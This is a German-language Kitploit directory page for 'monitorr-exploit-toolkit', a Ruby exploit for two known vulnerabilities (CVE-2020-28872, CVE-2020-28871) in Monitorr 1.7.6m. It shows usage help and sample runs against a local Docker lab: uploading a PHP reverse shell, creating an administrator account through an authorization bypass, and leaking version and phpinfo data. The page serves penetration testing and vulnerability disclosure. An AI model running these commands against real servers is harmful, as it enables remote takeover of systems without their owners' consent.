Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
monitorr-exploit-toolkit — Multiple exploits for Monitorr | Kitploit
Tools/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Multiple exploits for Monitorr

Repository anzeigen
101vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Monitorr-Exploit-Toolkit

  • RCE über unsicheren Datei-Upload (PHP-Reverse-Shell, Webshell usw.)
  • Erstellung von Administratorkonten über Autorisierungs-Bypass
  • Technischer Informationsabfluss: Monitorr-Version, PHP-Version, Systemversion & Kernel, PHP-Konfiguration usw.

Exploit für CVE-2020-28872 und CVE-2020-28871.

[PacketStorm]

Verwendung

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

Beispiele

Reverse-Shell hochladen:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

Erstellung eines Administratorkontos:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

Monitorr-Version abrufen:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

phpinfp() abrufen:

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

Voraussetzungen

  • httpx
  • docopt.rb

Beispiel mit gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Docker-Bereitstellung der verwundbaren Software

Warnung: Dieses Setup ist selbstverständlich nicht für den Produktionseinsatz geeignet!

root@kitploit:~
$ sudo docker-compose up

Richten Sie die App unter http://127.0.0.1:7000/monitorr/settings.php ein bzw. initialisieren Sie sie.

Einschränkungen

  • Upload: Die hochgeladene Datei muss ein Bild-Magic-Byte (z. B. GIF) aufweisen, damit sie getimagesize entspricht (Code)
  • Create: Das bei der Kontenerstellung verwendete Passwort muss mindestens 6 Zeichen lang sein (Mindestlimit der Anwendung)

Referenzen

  • Zielsoftware: Monitorr
    • Quelle: https://github.com/Monitorr/Monitorr/
    • Docker: https://hub.docker.com/r/monitorr/monitorr/
    • Verwundbare Version: 1.7.6m

Dies ist eine bessere Neufassung & Fusion von EDB-48981 (CVE-2020-28872) und EDB-48980 (CVE-2020-28871) mit zusätzlichen Funktionen.

Die Schwachstellen beim Upload und bei der Erstellung von Administratorkonten wurden von Lyhin's Lab entdeckt. Die Offenlegung von phpinfo und der Monitorr-Version wurde von Alexandre ZANNI aka noraj entdeckt.

Analyse des ursprünglichen Exploits und der Schwachstelle:

  • Wie White-Box-Hacking funktioniert: Autorisierungs-Bypass und Remote-Code-Ausführung in Monitorr 1.7.6
Tool herunterladen